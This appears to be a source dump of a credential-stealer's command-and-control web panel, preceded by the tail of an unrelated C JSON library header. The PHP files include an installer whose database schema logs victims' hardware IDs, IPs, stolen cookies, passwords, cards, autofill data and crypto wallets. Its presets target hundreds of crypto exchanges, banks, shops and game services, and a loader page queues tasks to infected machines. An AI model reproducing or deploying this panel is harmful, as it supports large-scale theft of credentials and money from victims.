json_serialize_to_string_pretty(const JSON_Value *value); 92 | 93 | void json_free_serialized_string(char *string); /* frees string from json_serialize_to_string and json_serialize_to_string_pretty */ 94 | 95 | /* Comparing */ 96 | int json_value_equals(const JSON_Value *a, const JSON_Value *b); 97 | 98 | /* Validation 99 | This is *NOT* JSON Schema. It validates json by checking if object have identically 100 | named fields with matching types. 101 | For example schema {"name":"", "age":0} will validate 102 | {"name":"Joe", "age":25} and {"name":"Joe", "age":25, "gender":"m"}, 103 | but not {"name":"Joe"} or {"name":"Joe", "age":"Cucumber"}. 104 | In case of arrays, only first value in schema is checked against all values in tested array. 105 | Empty objects ({}) validate all objects, empty arrays ([]) validate all arrays, 106 | null validates values of every type. 107 | */ 108 | JSON_Status json_validate(const JSON_Value *schema, const JSON_Value *value); 109 | 110 | /* 111 | * JSON Object 112 | */ 113 | JSON_Value * json_object_get_value (const JSON_Object *object, const char *name); 114 | const char * json_object_get_string (const JSON_Object *object, const char *name); 115 | JSON_Object * json_object_get_object (const JSON_Object *object, const char *name); 116 | JSON_Array * json_object_get_array (const JSON_Object *object, const char *name); 117 | double json_object_get_number (const JSON_Object *object, const char *name); /* returns 0 on fail */ 118 | int json_object_get_boolean(const JSON_Object *object, const char *name); /* returns -1 on fail */ 119 | 120 | /* dotget functions enable addressing values with dot notation in nested objects, 121 | just like in structs or c++/java/c# objects (e.g. objectA.objectB.value). 122 | Because valid names in JSON can contain dots, some values may be inaccessible 123 | this way. */ 124 | JSON_Value * json_object_dotget_value (const JSON_Object *object, const char *name); 125 | const char * json_object_dotget_string (const JSON_Object *object, const char *name); 126 | JSON_Object * json_object_dotget_object (const JSON_Object *object, const char *name); 127 | JSON_Array * json_object_dotget_array (const JSON_Object *object, const char *name); 128 | double json_object_dotget_number (const JSON_Object *object, const char *name); /* returns 0 on fail */ 129 | int json_object_dotget_boolean(const JSON_Object *object, const char *name); /* returns -1 on fail */ 130 | 131 | /* Functions to get available names */ 132 | size_t json_object_get_count (const JSON_Object *object); 133 | const char * json_object_get_name (const JSON_Object *object, size_t index); 134 | JSON_Value * json_object_get_value_at(const JSON_Object *object, size_t index); 135 | JSON_Value * json_object_get_wrapping_value(const JSON_Object *object); 136 | 137 | /* Functions to check if object has a value with a specific name. Returned value is 1 if object has 138 | * a value and 0 if it doesn't. dothas functions behave exactly like dotget functions. */ 139 | int json_object_has_value (const JSON_Object *object, const char *name); 140 | int json_object_has_value_of_type(const JSON_Object *object, const char *name, JSON_Value_Type type); 141 | 142 | int json_object_dothas_value (const JSON_Object *object, const char *name); 143 | int json_object_dothas_value_of_type(const JSON_Object *object, const char *name, JSON_Value_Type type); 144 | 145 | /* Creates new name-value pair or frees and replaces old value with a new one. 146 | * json_object_set_value does not copy passed value so it shouldn't be freed afterwards. */ 147 | JSON_Status json_object_set_value(JSON_Object *object, const char *name, JSON_Value *value); 148 | JSON_Status json_object_set_string(JSON_Object *object, const char *name, const char *string); 149 | JSON_Status json_object_set_number(JSON_Object *object, const char *name, double number); 150 | JSON_Status json_object_set_boolean(JSON_Object *object, const char *name, int boolean); 151 | JSON_Status json_object_set_null(JSON_Object *object, const char *name); 152 | 153 | /* Works like dotget functions, but creates whole hierarchy if necessary. 154 | * json_object_dotset_value does not copy passed value so it shouldn't be freed afterwards. */ 155 | JSON_Status json_object_dotset_value(JSON_Object *object, const char *name, JSON_Value *value); 156 | JSON_Status json_object_dotset_string(JSON_Object *object, const char *name, const char *string); 157 | JSON_Status json_object_dotset_number(JSON_Object *object, const char *name, double number); 158 | JSON_Status json_object_dotset_boolean(JSON_Object *object, const char *name, int boolean); 159 | JSON_Status json_object_dotset_null(JSON_Object *object, const char *name); 160 | 161 | /* Frees and removes name-value pair */ 162 | JSON_Status json_object_remove(JSON_Object *object, const char *name); 163 | 164 | /* Works like dotget function, but removes name-value pair only on exact match. */ 165 | JSON_Status json_object_dotremove(JSON_Object *object, const char *key); 166 | 167 | /* Removes all name-value pairs in object */ 168 | JSON_Status json_object_clear(JSON_Object *object); 169 | 170 | /* 171 | *JSON Array 172 | */ 173 | JSON_Value * json_array_get_value (const JSON_Array *array, size_t index); 174 | const char * json_array_get_string (const JSON_Array *array, size_t index); 175 | JSON_Object * json_array_get_object (const JSON_Array *array, size_t index); 176 | JSON_Array * json_array_get_array (const JSON_Array *array, size_t index); 177 | double json_array_get_number (const JSON_Array *array, size_t index); /* returns 0 on fail */ 178 | int json_array_get_boolean(const JSON_Array *array, size_t index); /* returns -1 on fail */ 179 | size_t json_array_get_count (const JSON_Array *array); 180 | JSON_Value * json_array_get_wrapping_value(const JSON_Array *array); 181 | 182 | /* Frees and removes value at given index, does nothing and returns JSONFailure if index doesn't exist. 183 | * Order of values in array may change during execution. */ 184 | JSON_Status json_array_remove(JSON_Array *array, size_t i); 185 | 186 | /* Frees and removes from array value at given index and replaces it with given one. 187 | * Does nothing and returns JSONFailure if index doesn't exist. 188 | * json_array_replace_value does not copy passed value so it shouldn't be freed afterwards. */ 189 | JSON_Status json_array_replace_value(JSON_Array *array, size_t i, JSON_Value *value); 190 | JSON_Status json_array_replace_string(JSON_Array *array, size_t i, const char* string); 191 | JSON_Status json_array_replace_number(JSON_Array *array, size_t i, double number); 192 | JSON_Status json_array_replace_boolean(JSON_Array *array, size_t i, int boolean); 193 | JSON_Status json_array_replace_null(JSON_Array *array, size_t i); 194 | 195 | /* Frees and removes all values from array */ 196 | JSON_Status json_array_clear(JSON_Array *array); 197 | 198 | /* Appends new value at the end of array. 199 | * json_array_append_value does not copy passed value so it shouldn't be freed afterwards. */ 200 | JSON_Status json_array_append_value(JSON_Array *array, JSON_Value *value); 201 | JSON_Status json_array_append_string(JSON_Array *array, const char *string); 202 | JSON_Status json_array_append_number(JSON_Array *array, double number); 203 | JSON_Status json_array_append_boolean(JSON_Array *array, int boolean); 204 | JSON_Status json_array_append_null(JSON_Array *array); 205 | 206 | /* 207 | *JSON Value 208 | */ 209 | JSON_Value * json_value_init_object (void); 210 | JSON_Value * json_value_init_array (void); 211 | JSON_Value * json_value_init_string (const char *string); /* copies passed string */ 212 | JSON_Value * json_value_init_number (double number); 213 | JSON_Value * json_value_init_boolean(int boolean); 214 | JSON_Value * json_value_init_null (void); 215 | JSON_Value * json_value_deep_copy (const JSON_Value *value); 216 | void json_value_free (JSON_Value *value); 217 | 218 | JSON_Value_Type json_value_get_type (const JSON_Value *value); 219 | JSON_Object * json_value_get_object (const JSON_Value *value); 220 | JSON_Array * json_value_get_array (const JSON_Value *value); 221 | const char * json_value_get_string (const JSON_Value *value); 222 | double json_value_get_number (const JSON_Value *value); 223 | int json_value_get_boolean(const JSON_Value *value); 224 | JSON_Value * json_value_get_parent (const JSON_Value *value); 225 | 226 | /* Same as above, but shorter */ 227 | JSON_Value_Type json_type (const JSON_Value *value); 228 | JSON_Object * json_object (const JSON_Value *value); 229 | JSON_Array * json_array (const JSON_Value *value); 230 | const char * json_string (const JSON_Value *value); 231 | double json_number (const JSON_Value *value); 232 | int json_boolean(const JSON_Value *value); 233 | 234 | #ifdef __cplusplus 235 | } 236 | #endif 237 | 238 | #endif 239 | -------------------------------------------------------------------------------- /Panel/loader.php: -------------------------------------------------------------------------------- 1 | exec("INSERT INTO `tasks`(`id`, `name`, `count`, `country`, `task`, `preset`,`params`,`status`) VALUES (null, '$name', '$count', '$country', '$task', '$preset','$str', 0)"); 22 | } 23 | } 24 | if ($delete != null) { 25 | $pdoConnection->exec("DELETE FROM `tasks` WHERE id = '" . formatString($delete) . "'"); 26 | header("Location: loader.php", true, 301); 27 | } 28 | 29 | function formatString($param) 30 | { 31 | $returnString = $param; 32 | $returnString = trim($returnString); 33 | $returnString = stripslashes($returnString); 34 | $returnString = htmlspecialchars($returnString); 35 | 36 | return $returnString; 37 | } 38 | 39 | ?> 40 | 41 | 42 | 43 | 44 | Loader 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 |
53 |
54 |
55 | 82 |
83 |
84 |
85 | 86 |
87 |
88 |
89 |
90 |
91 |
92 |

93 |
94 |
95 | 96 |
97 | 99 |
100 |
101 | 102 |
103 | 113 |
114 |
115 |
116 | 117 |
118 | 120 |
121 |
122 |
123 | 124 |
125 | 127 |
128 |
129 |
130 | 131 |
132 | 133 |
134 |
135 |
136 |
137 | 138 | 142 |
143 |
144 | 145 | 149 |
150 |
151 | 152 | 156 |
157 |
158 |
159 |
160 | 161 | 165 |
166 |
167 | 168 | 172 |
173 |
174 | 175 | 179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 |
188 |
189 |
190 |
191 |
192 |

Tasks

193 |
194 |
195 |
196 |
197 |
198 |
199 |
200 |

Tasks

201 |
202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | 211 | 212 | 213 | 214 | 215 | 216 | query("SELECT * FROM `tasks`"); 218 | while ($task = $tasks->fetch(PDO::FETCH_ASSOC)) { 219 | if ($task["status"] < $task["count"]) { 220 | $status = ""; 221 | } else if ($task["count"] == 0) { 222 | $status = ""; 223 | } else { 224 | $status = ""; 225 | } 226 | ?> 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 | 235 | 238 | 239 | 242 | 243 |
IDPresetNameParamsCountCountryStatusActions
"> 236 | 237 |
244 |
245 |
246 |
247 |
248 |
249 |
250 |
251 | 254 | -------------------------------------------------------------------------------- /Panel/install.php: -------------------------------------------------------------------------------- 1 | '; 39 | 40 | fwrite($config_file, $configuration); 41 | fclose($config_file); 42 | } 43 | 44 | else 45 | { 46 | $error = "Please enter all params!"; 47 | } 48 | try 49 | { 50 | include(dirname(__FILE__)."/database.php"); 51 | } 52 | catch(Exception $e) 53 | { 54 | $error = "Can't connect to database."; 55 | } 56 | if(isset($pdoConnection)) 57 | { 58 | $pdoConnection->exec('SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";'); 59 | $pdoConnection->exec('SET time_zone = "+00:00";'); 60 | $pdoConnection->exec('CREATE TABLE `grabber` ( 61 | `id` int(11) NOT NULL, 62 | `name` text NOT NULL, 63 | `folder` text NOT NULL, 64 | `pattern` text NOT NULL, 65 | `exception` text NOT NULL 66 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8;'); 67 | $pdoConnection->exec("CREATE TABLE `logs` ( 68 | `id` int(11) NOT NULL, 69 | `userID` text NOT NULL, 70 | `hwid` text NOT NULL, 71 | `system` text NOT NULL, 72 | `ip` text NOT NULL, 73 | `country` text NOT NULL, 74 | `date` text NOT NULL, 75 | `count` int(11) DEFAULT NULL, 76 | `cookie` int(11) DEFAULT NULL, 77 | `pswd` int(11) DEFAULT NULL, 78 | `buildversion` text, 79 | `credit` int(11) DEFAULT '0', 80 | `autofill` int(11) DEFAULT '0', 81 | `wallets` int(11) DEFAULT '0', 82 | `checked` int(11) NOT NULL DEFAULT '0', 83 | `comment` text NOT NULL 84 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8;"); 85 | 86 | $pdoConnection->exec("CREATE TABLE `presets` ( 87 | `id` int(11) NOT NULL, 88 | `name` text NOT NULL, 89 | `color` text NOT NULL, 90 | `pattern` text NOT NULL 91 | ) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;"); 92 | $pdoConnection->exec("INSERT INTO `presets` (`id`, `name`, `color`, `pattern`) VALUES 93 | (0, 'Crypto', 'MEDIUMVIOLETRED', 'freewallet.org;paxful.com;capdax.com;wazirx.com;okex.com;bitfinex.com;hitbtc.com;kraken.com;gateio.io;bitstamp.net;bittrex.com;exmo;yobit;poloniex.com;bitflyer.jp;livecoin.net;wex.nz;cryptonator;mercatox.com;localbitcoins.com;localbitcoins.net;luno.;coinpayments;therocktrading.com;etherdelta.com;anxpro.com;c-cex.com;gatecoin.com;kiwi-coin.com;jubi.com;koineks.com;ecoin.cc;koinim.com;litebit.eu;lykke.com;mangr.com;localtrade.pro;lbank.info;leoxchange.com;liqui.io;kuna.io;fybse.se;freiexchange.com;fybsg.com;gatehub.net;getbtc.org;gemini.com;gdax.com;foxbit.com.br;foxbit.exchange;flowbtc.com.br;exx.com;exrates.me;excambriorex.com;ezbtc.ca;fargobase.com;fisco.co.uk;glidera.io;indacoin.com;ethexindia.com;indx.ru;infinitycoin.exchange;idex.su;idex.market;ice3x.com;ice3x.co.za;guldentrader.com;exchange.guldentrader.com;heatwallet.com;hypex.nl;negociecoins.com.br;topbtc.com;tidex.com;tidebit.com;tradesatoshi.com;urdubit.com;tuxexchange.com;tdax.com;spacebtc.com;surbitcoin.com;surbtc.com;usd-x.com;xbtce.com;yunbi.com;zyado.com;trade.z.com;zaif.jp;wavesplatform.com;walltime.info;vbtc.exchange;vaultoro.com;vircurex.com;virtacoinworld.com;vwlpro.com;nlexch.com;nevbit.com;nocks.com;novaexchange.com;nxtplatform.org;neraex.pro;mixcoins.com;mr-ripple.com;dsx.uk;nzbcx.com;okcoin.com;quadrigacx.com;quoinex.com;rightbtc.com;ripplefox.com;rippex.net;openledger.info;paymium.com;paribu.com;mercadobitcoin.com.br;dcexe.com;bitmex.com;bitmaszyna.pl;bitonic.nl;bitpanda.com;bitsblockchain.net;bitmarket.net;bitlish.com;bitfex.trade;bitexbook.com;bitex.la;bitflip.cc;bitgrail.com;bitkan.com;bitinka.com;bitholic.com;bitsane.com;changer.com;bitshares.org;btcmarkets.net;braziliex.com;btc-trade.com.ua;btc-alpha.com;bl3p.eu;bitssa.com;bitspark.io;bitso.com;bitstar.com;ittylicious.com;altcointrader.co.za;arenabitcoin;allcoin.com;abucoins.com;aidosmarket.com;aex.com;acx.com;bancor.network;bitbay.net;indodax.com;bitcointrade.com.br;bitcointoyou.com;bitbanktrade.jp;bitbank.com;big.one;bcex.ru;bitconnect.co;bisq.network;bit2c.co.il;bit-z.com;btcbear.com;btcbox.in;counterwallet.io;freewallet.io;indiesquare.me;rarepepewallet.com;coss.io;coolcoin.com;crex24.com;cryptex.net;coinut.com;coinsbank.com;coinsecure.in;coinsquare.com;coinsquare.io;coinspot.io;coinmarketcap.com;crypto-bridge.org;dcex.com;dabtc.com;decentrex.com;deribit.com;dgtmarket.com;cryptomkt.com;cryptoderivatives.market;cryptodao.com;cryptomate.co.uk;cryptox.pl;cryptopia.co.nz;coinroom.com;coinrate.net;chbtc.com;chilebit.net;coinbase.com;burst-coin.org;poloniex.com;btcc.;binance;btcc.net;btc-trade.com.ua;btctrade.im;btcturk.com;btcxindia.com;coincheck.com;coinmate.io;coingi.com;coinnest.co.kr;coinrail.co.kr;coinpit.io;coingather.com;coinfloor.co.uk;coinegg.com;coincorner.com;coinexchange.io;coinfalcon.com;digatrade.com;btc-alpha.com;blockchain;minergate;myetherwallet.com;litevault.net;dogechain.info;coinome;bitbns;btc.top;etherdelta.com;btcbank.com.ua;coindelta.com;depotwallet.com;kryptex.org'), 94 | (1, 'Shop', 'green', 'amazon;ebay;walmart;newegg;apple;bestbuy'), 95 | (2, 'Money', 'GOLD', 'paypal;chase.com;TD;wells;capitalone;skrill;PayU'), 96 | (3, 'Game', 'MEDIUMSLATEBLUE', 'steam;origin;ubi.com');"); 97 | 98 | $pdoConnection->exec('CREATE TABLE `settings` ( 99 | `id` int(11) NOT NULL, 100 | `cisLogs` text NOT NULL, 101 | `repeatLogs` text NOT NULL, 102 | `telegram` text NOT NULL, 103 | `history` text NOT NULL, 104 | `autocomplete` text NOT NULL, 105 | `cards` text NOT NULL, 106 | `cookies` text NOT NULL, 107 | `passwords` text NOT NULL, 108 | `jabber` text NOT NULL, 109 | `ftp` text NOT NULL, 110 | `screenshot` text NOT NULL, 111 | `selfDelete` text NOT NULL, 112 | `vpn` text NOT NULL, 113 | `grabber` text NOT NULL, 114 | `executionTime` text NOT NULL 115 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8;'); 116 | 117 | $pdoConnection->exec("INSERT INTO `settings` (`id`, `cisLogs`, `repeatLogs`, `telegram`, `history`, `autocomplete`, `cards`, `cookies`, `passwords`, `jabber`, `ftp`, `screenshot`, `selfDelete`, `vpn`, `grabber`, `executionTime`) VALUES 118 | (0, 'on', 'on', 'on', 'on', 'on', 'on', 'on', 'on', 'on', 'on', 'on', 'on', 'on', 'off', '0');"); 119 | 120 | $pdoConnection->exec('CREATE TABLE `tasks` ( 121 | `id` int(11) NOT NULL, 122 | `name` text NOT NULL, 123 | `count` int(11) NOT NULL, 124 | `country` text NOT NULL, 125 | `task` text NOT NULL, 126 | `preset` text NOT NULL, 127 | `params` text NOT NULL, 128 | `status` int(11) NOT NULL 129 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8;'); 130 | $pdoConnection->exec('ALTER TABLE `grabber` 131 | ADD PRIMARY KEY (`id`);'); 132 | $pdoConnection->exec('ALTER TABLE `logs` 133 | ADD PRIMARY KEY (`id`);'); 134 | $pdoConnection->exec('ALTER TABLE `presets` 135 | ADD PRIMARY KEY (`id`), 136 | ADD UNIQUE KEY `id` (`id`), 137 | ADD UNIQUE KEY `id_2` (`id`);'); 138 | $pdoConnection->exec('ALTER TABLE `settings` 139 | ADD PRIMARY KEY (`id`);'); 140 | $pdoConnection->exec('ALTER TABLE `tasks` 141 | ADD PRIMARY KEY (`id`);'); 142 | $pdoConnection->exec('ALTER TABLE `grabber` 143 | MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;'); 144 | $pdoConnection->exec('ALTER TABLE `presets` 145 | MODIFY `id` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=4;'); 146 | $pdoConnection->exec('ALTER TABLE `tasks` 147 | MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;'); 148 | $pdoConnection->exec('ALTER TABLE `logs` 149 | MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;'); 150 | $pdoConnection->exec('ALTER TABLE `grabber` 151 | MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;'); 152 | 153 | header('Location: index.php?install=true', true, 301); 154 | die(); 155 | } 156 | else 157 | { 158 | $error = "Can't connect to database."; 159 | } 160 | } 161 | function checkParam($param) 162 | { 163 | $formatted = $param; 164 | $formatted = trim($formatted); 165 | $formatted = stripslashes($formatted); 166 | $formatted = htmlspecialchars($formatted); 167 | 168 | return $formatted; 169 | } 170 | ?> 171 | 172 | 173 | 174 | 175 | 176 | Install 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 |
188 |
189 | 190 |
191 |
192 |
193 |
194 | 198 | 201 | 205 | 208 | 209 | 212 | 213 |
214 |
215 |
216 |

Database info

217 |
218 | 219 |
220 | 221 |
222 |
223 |
224 | 225 |
226 | 227 |
228 |
229 |
230 | 231 |
232 | 233 |
234 |
235 |
236 | 237 |
238 | 239 |
240 |
241 |
242 |
243 |
244 |
245 |
246 |
247 |

Server info

248 |
249 | 250 |
251 | 252 |
253 |
254 |
255 | 256 |
257 | 258 |
259 |
260 |
261 |
262 | 263 |
264 |
265 |
266 |
267 |
268 | 269 |
270 | 271 |
272 | 273 | 274 | -------------------------------------------------------------------------------- /Panel/assets/GeoIP/geoip.php: -------------------------------------------------------------------------------- 1 | lookupCountryCode($ip); 7 | } 8 | 9 | function ip_name($ip = FALSE){ 10 | $geoip = geo_ip::getInstance(dirname(__FILE__) . "/geoip.dat"); 11 | $ip = $ip == FALSE ? $_SERVER['REMOTE_ADDR'] : $ip; 12 | return $geoip->lookupCountryName($ip); 13 | } 14 | 15 | function ip_img_style($ip = FALSE){ 16 | 17 | include dirname(__FILE__) . "/config.php"; 18 | 19 | $geoip = geo_ip::getInstance(dirname(__FILE__) . "/geoip.dat"); 20 | $ip = $ip == FALSE ? $_SERVER['REMOTE_ADDR'] : $ip; 21 | 22 | $name = str_replace(" ", "_", strtolower($geoip->lookupCountryName($ip))); 23 | 24 | $rel = array('?', 'afghanistan', 'albania', 'algeria', 'american_samoa', 'andorra', 'angola', 'anguilla', 'antigua_and_barbuda', 'argentina', 'armenia', 'aruba', 'australia', 'austria', 'azerbaijan', 'bahamas', 'bahrain', 'bangladesh', 'barbados', 'belarus', 'belgium', 'belize', 'benin', 'bermuda', 'bhutan', 'bolivia', 'bosnia_and_herzegovina', 'botswana', 'brazil', 'british_indian_ocean_territory', 'british_virgin_islands', 'brunei', 'bulgaria', 'burkina_faso', 'burma', 'burundi', 'cambodia', 'cameroon', 'canada', 'cape_verde', 'cayman_islands', 'central_african_republic', 'chad', 'chile', 'china', 'colombia', 'comoros', 'congo_democratic_republic', 'congo_republic', 'cook_islands', 'costa_rica', 'cote_divoire', 'croatia', 'cuba', 'cyprus', 'czech_republic', 'denmark', 'djibouti', 'dominica', 'dominican_republic', 'east_timor', 'egypt', 'el_salvador', 'england', 'equador', 'equatorial_guinea', 'eritrea', 'estonia', 'ethiopia', 'falkland_islands', 'faroe_islands', 'fiji', 'finland', 'france', 'french_polynesia', 'gabon', 'gambia', 'georgia', 'germany', 'ghana', 'gibraltar', 'greece', 'greenland', 'grenada', 'guam', 'guatemala', 'guernsey', 'guinea', 'guinea_bissau', 'guyana', 'haiti', 'honduras', 'hong_kong', 'hungary', 'iceland', 'india', 'indonesia', 'iran', 'iraq', 'ireland', 'isle_of_man', 'israel', 'italy', 'jamaica', 'japan', 'jersey', 'jordan', 'kazakhstan', 'kenya', 'kiribati', 'kuwait', 'kyrgyzstan', 'laos', 'latvia', 'lebanon', 'lesotho', 'liberia', 'libya', 'liechtenstein', 'lithuania', 'luxembourg', 'macau', 'macedonia', 'madagascar', 'malawi', 'malaysia', 'maledives', 'mali', 'malta', 'marshall_islands', 'martinique', 'mauretania', 'mauritius', 'mexico', 'micronesia', 'moldova', 'monaco', 'mongolia', 'montserrat', 'morocco', 'mozambique', 'namibia', 'nauru', 'nepal', 'netherlands', 'netherlands_antilles', 'new_zealand', 'nicaragua', 'niger', 'nigeria', 'niue', 'norfolk_island', 'north_korea', 'northern_mariana_islands', 'norway', 'oman', 'pakistan', 'palau', 'panama', 'papua_new_guinea', 'paraguay', 'peru', 'philippines', 'pitcairn_islands', 'poland', 'portugal', 'puerto_rico', 'qatar', 'romania', 'russia', 'rwanda', 'saint_helena', 'saint_kitts_and_nevis', 'saint_lucia', 'saint_pierre_and_miquelon', 'saint_vincent_and_the_grenadines', 'samoa', 'san_marino', 'sao_tome_and_principe', 'saudi_arabia', 'scotland', 'senegal', 'serbia_montenegro', 'seychelles', 'sierra_leone', 'singapore', 'slovakia', 'slovenia', 'solomon_islands', 'somalia', 'south_africa', 'south_georgia', 'south_korea', 'spain', 'sri_lanka', 'sudan', 'suriname', 'swaziland', 'sweden', 'switzerland', 'syria', 'taiwan', 'tajikistan', 'tanzania', 'thailand', 'tibet', 'togo', 'tonga', 'trinidad_and_tobago', 'tunisia', 'turkey', 'turkmenistan', 'turks_and_caicos_islands', 'tuvalu', 'uganda', 'ukraine', 'united_arab_emirates', 'united_kingdom', 'uruguay', 'usa', 'uzbekistan', 'vanuatu', 'vatican_city', 'venezuela', 'vietnam', 'virgin_islands', 'wales', 'wallis_and_futuna', 'yemen', 'zambia', 'zimbabwe'); 25 | 26 | return "width: {$w}px; height: {$w}px; background: url({$path}) no-repeat scroll 0px -" . (array_search($name, $rel) * $w) . "px transparent;"; 27 | } 28 | 29 | 30 | class geo_ip { 31 | 32 | static $COUNTRY_CODES = array("?", "AP", "EU", "AD", "AE", "AF", "AG", "AI", "AL", "AM", "AN", "AO", "AQ", "AR", "AS", "AT", "AU", "AW", "AZ", "BA", "BB", "BD", "BE", "BF", "BG", "BH", "BI", "BJ", "BM", "BN", "BO", "BR", "BS", "BT", "BV", "BW", "BY", "BZ", "CA", "CC", "CD", "CF", "CG", "CH", "CI", "CK", "CL", "CM", "CN", "CO", "CR", "CU", "CV", "CX", "CY", "CZ", "DE", "DJ", "DK", "DM", "DO", "DZ", "EC", "EE", "EG", "EH", "ER", "ES", "ET", "FI", "FJ", "FK", "FM", "FO", "FR", "FX", "GA", "GB", "GD", "GE", "GF", "GH", "GI", "GL", "GM", "GN", "GP", "GQ", "GR", "GS", "GT", "GU", "GW", "GY", "HK", "HM", "HN", "HR", "HT", "HU", "ID", "IE", "IL", "IN", "IO", "IQ", "IR", "IS", "IT", "JM", "JO", "JP", "KE", "KG", "KH", "KI", "KM", "KN", "KP", "KR", "KW", "KY", "KZ", "LA", "LB", "LC", "LI", "LK", "LR", "LS", "LT", "LU", "LV", "LY", "MA", "MC", "MD", "MG", "MH", "MK", "ML", "MM", "MN", "MO", "MP", "MQ", "MR", "MS", "MT", "MU", "MV", "MW", "MX", "MY", "MZ", "NA", "NC", "NE", "NF", "NG", "NI", "NL", "NO", "NP", "NR", "NU", "NZ", "OM", "PA", "PE", "PF", "PG", "PH", "PK", "PL", "PM", "PN", "PR", "PS", "PT", "PW", "PY", "QA", "RE", "RO", "RU", "RW", "SA", "SB", "SC", "SD", "SE", "SG", "SH", "SI", "SJ", "SK", "SL", "SM", "SN", "SO", "SR", "ST", "SV", "SY", "SZ", "TC", "TD", "TF", "TG", "TH", "TJ", "TK", "TM", "TN", "TO", "TP", "TR", "TT", "TV", "TW", "TZ", "UA", "UG", "UM", "US", "UY", "UZ", "VA", "VC", "VE", "VG", "VI", "VN", "VU", "WF", "WS", "YE", "YT", "YU", "ZA", "ZM", "ZR", "ZW", "A1", "A2", "O1"); 33 | 34 | static $COUNTRY_NAMES = array("?", "Asia/Pacific Region", "Europe", "Andorra", "United Arab Emirates", "Afghanistan", "Antigua and Barbuda", "Anguilla", "Albania", "Armenia", "Netherlands Antilles", "Angola", "Antarctica", "Argentina", "American Samoa", "Austria", "Australia", "Aruba", "Azerbaijan", "Bosnia and Herzegovina", "Barbados", "Bangladesh", "Belgium", "Burkina Faso", "Bulgaria", "Bahrain", "Burundi", "Benin", "Bermuda", "Brunei Darussalam", "Bolivia", "Brazil", "Bahamas", "Bhutan", "Bouvet Island", "Botswana", "Belarus", "Belize", "Canada", "Cocos (Keeling) Islands", "Congo, The Democratic Republic of the", "Central African Republic", "Congo", "Switzerland", "Cote Divoire", "Cook Islands", "Chile", "Cameroon", "China", "Colombia", "Costa Rica", "Cuba", "Cape Verde", "Christmas Island", "Cyprus", "Czech Republic", "Germany", "Djibouti", "Denmark", "Dominica", "Dominican Republic", "Algeria", "Ecuador", "Estonia", "Egypt", "Western Sahara", "Eritrea", "Spain", "Ethiopia", "Finland", "Fiji", "Falkland Islands (Malvinas)", "Micronesia, Federated States of", "Faroe Islands", "France", "France, Metropolitan", "Gabon", "United Kingdom", "Grenada", "Georgia", "French Guiana", "Ghana", "Gibraltar", "Greenland", "Gambia", "Guinea", "Guadeloupe", "Equatorial Guinea", "Greece", "South Georgia and the South Sandwich Islands", "Guatemala", "Guam", "Guinea Bissau", "Guyana", "Hong Kong", "Heard Island and McDonald Islands", "Honduras", "Croatia", "Haiti", "Hungary", "Indonesia", "Ireland", "Israel", "India", "British Indian Ocean Territory", "Iraq", "Iran", "Iceland", "Italy", "Jamaica", "Jordan", "Japan", "Kenya", "Kyrgyzstan", "Cambodia", "Kiribati", "Comoros", "Saint Kitts and Nevis", "North Korea", "South Korea", "Kuwait", "Cayman Islands", "Kazakhstan", "Lao People's Democratic Republic", "Lebanon", "Saint Lucia", "Liechtenstein", "Sri Lanka", "Liberia", "Lesotho", "Lithuania", "Luxembourg", "Latvia", "Libyan Arab Jamahiriya", "Morocco", "Monaco", "Moldova", "Madagascar", "Marshall Islands", "Macedonia", "Mali", "Myanmar", "Mongolia", "Macau", "Northern Mariana Islands", "Martinique", "Mauritania", "Montserrat", "Malta", "Mauritius", "Maldives", "Malawi", "Mexico", "Malaysia", "Mozambique", "Namibia", "New Caledonia", "Niger", "Norfolk Island", "Nigeria", "Nicaragua", "Netherlands", "Norway", "Nepal", "Nauru", "Niue", "New Zealand", "Oman", "Panama", "Peru", "French Polynesia", "Papua New Guinea", "Philippines", "Pakistan", "Poland", "Saint Pierre and Miquelon", "Pitcairn Islands", "Puerto Rico", "Palestinian Territory, Occupied", "Portugal", "Palau", "Paraguay", "Qatar", "Reunion", "Romania", "Russia", "Rwanda", "Saudi Arabia", "Solomon Islands", "Seychelles", "Sudan", "Sweden", "Singapore", "Saint Helena", "Slovenia", "Svalbard and Jan Mayen", "Slovakia", "Sierra Leone", "San Marino", "Senegal", "Somalia", "Suriname", "Sao Tome and Principe", "El Salvador", "Syria", "Swaziland", "Turks and Caicos Islands", "Chad", "French Southern Territories", "Togo", "Thailand", "Tajikistan", "Tokelau", "Turkmenistan", "Tunisia", "Tonga", "East Timor", "Turkey", "Trinidad and Tobago", "Tuvalu", "Taiwan", "Tanzania, United Republic of", "Ukraine", "Uganda", "United States Minor Outlying Islands", "USA", "Uruguay", "Uzbekistan", "Holy See (Vatican City State)", "Saint Vincent and the Grenadines", "Venezuela", "Virgin Islands, British", "Virgin Islands, U.S.", "Vietnam", "Vanuatu", "Wallis and Futuna", "Samoa", "Yemen", "Mayotte", "Bosnia and Herzegovina", "South Africa", "Zambia", "Democratic Republic Congo", "Zimbabwe", "Anonymous Proxy","Satellite Provider","Other"); 35 | 36 | const STANDARD = 0; 37 | const MEMORY_CACHE = 1; 38 | const SHARED_MEMORY = 2; 39 | const COUNTRY_BEGIN = 16776960; 40 | const STATE_BEGIN_REV0 = 16700000; 41 | const STATE_BEGIN_REV1 = 16000000; 42 | const STRUCTURE_INFO_MAX_SIZE = 20; 43 | const DATABASE_INFO_MAX_SIZE = 100; 44 | const COUNTRY_EDITION = 106; 45 | const REGION_EDITION_REV0 = 112; 46 | const REGION_EDITION_REV1 = 3; 47 | const CITY_EDITION_REV0 = 111; 48 | const CITY_EDITION_REV1 = 2; 49 | const ORG_EDITION = 110; 50 | const SEGMENT_RECORD_LENGTH = 3; 51 | const STANDARD_RECORD_LENGTH = 3; 52 | const ORG_RECORD_LENGTH = 4; 53 | const 